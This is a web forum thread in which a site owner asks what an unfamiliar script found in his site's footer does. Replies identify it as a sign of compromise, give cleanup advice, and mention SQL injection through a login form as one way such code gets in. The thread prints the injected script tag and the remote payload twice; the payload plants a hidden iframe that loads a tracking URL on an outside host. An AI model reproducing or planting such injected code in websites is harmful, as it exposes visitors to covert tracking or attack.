SitePoint Sponsor

User Tag List

Results 1 to 4 of 4

Thread: Rogue code?

  1. #1
    SitePoint Guru
    Join Date
    Nov 2000
    Posts
    741
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Rogue code?

    I found this code in the footer of my site:

    Code:
    <script type="text/javascript" async="async" src="http://www.topadtackers.com/query.php"></script>
    If you follow that link, it takes you to a page with this code:

    Code:
    <html><head></head><body>SecBanner = {                   init: function () { 			this.dodiv();	                       //document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>');                       var ad = document.createElement('iframe');                       var url = 'http://www.topadtackers.com/track.php?w=470008604&amp;sh=7297e42f430cb7404fad83e64352409c';                       ad.setAttribute('src', url);                       ad.src = url;                       ad.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       ad.style.visibility = 'hidden';                       ad.style.display = 'none';                       var div = document.getElementById('SecAD'); 			if(div == null) { 				var div = document.getElementById('footer'); 			} 			if(div == null) { 				var div = document.getElementsByTagName('body')[0]; 			}                        div.appendChild(ad);                   }, 		dodiv: function() {                         document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>'); 		}               }               SecBanner.init();</body></html>
    Any idea what that code does?

  2. #2
    Certified Ethical Hacker silver trophybronze trophy dklynn's Avatar
    Join Date
    Feb 2002
    Location
    Auckland
    Posts
    14,680
    Mentioned
    20 Post(s)
    Tagged
    3 Thread(s)
    Jon,

    If you didn't put it there, the simple fact that it's there means that you've been hacked. DELETE it immediately, strengthen your passwords, have your host run maldet scans (until you're clean), then run daily scans on vulnerable files (html, php, and js at a minimum). You just don't need hidden divs on your website which you didn't intend and it's not worth going through others' code which could lead you to their websites for ... well, attacks on you as a visitor.

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator

  3. #3
    SitePoint Guru
    Join Date
    Nov 2000
    Posts
    741
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks for the recommendations.

  4. #4
    SitePoint Enthusiast
    Join Date
    Apr 2003
    Location
    London
    Posts
    39
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I had this happen to my site too a couple years back. The problem in my case was that I am using dynamic content on my site. It was a SQL Insertion attack, basically any TEXT fields in my database were full of those. They did it by executing a SQL stored procedure through one of my login forms (ie, instead of a username they put a SQL escape sequence @@ that ran a stored proccedure). So if you are using dynamic content for that footer, your DB may be riddled with them. If thats the case, make sure you are are protecting against SQL insertion and run a script to clean up all the tables.


    Quote Originally Posted by Jon Lawrance View Post
    I found this code in the footer of my site:

    Code:
    <script type="text/javascript" async="async" src="http://www.topadtackers.com/query.php"></script>
    If you follow that link, it takes you to a page with this code:

    Code:
    <html><head></head><body>SecBanner = {                   init: function () { 			this.dodiv();	                       //document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>');                       var ad = document.createElement('iframe');                       var url = 'http://www.topadtackers.com/track.php?w=470008604&sh=7297e42f430cb7404fad83e64352409c';                       ad.setAttribute('src', url);                       ad.src = url;                       ad.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       ad.style.visibility = 'hidden';                       ad.style.display = 'none';                       var div = document.getElementById('SecAD'); 			if(div == null) { 				var div = document.getElementById('footer'); 			} 			if(div == null) { 				var div = document.getElementsByTagName('body')[0]; 			}                        div.appendChild(ad);                   }, 		dodiv: function() {                         document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>'); 		}               }               SecBanner.init();</body></html>
    Any idea what that code does?
    Chuck
    --------------------------
    Add Poker Tables to your Website
    http://www.PlugInPoker.com


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •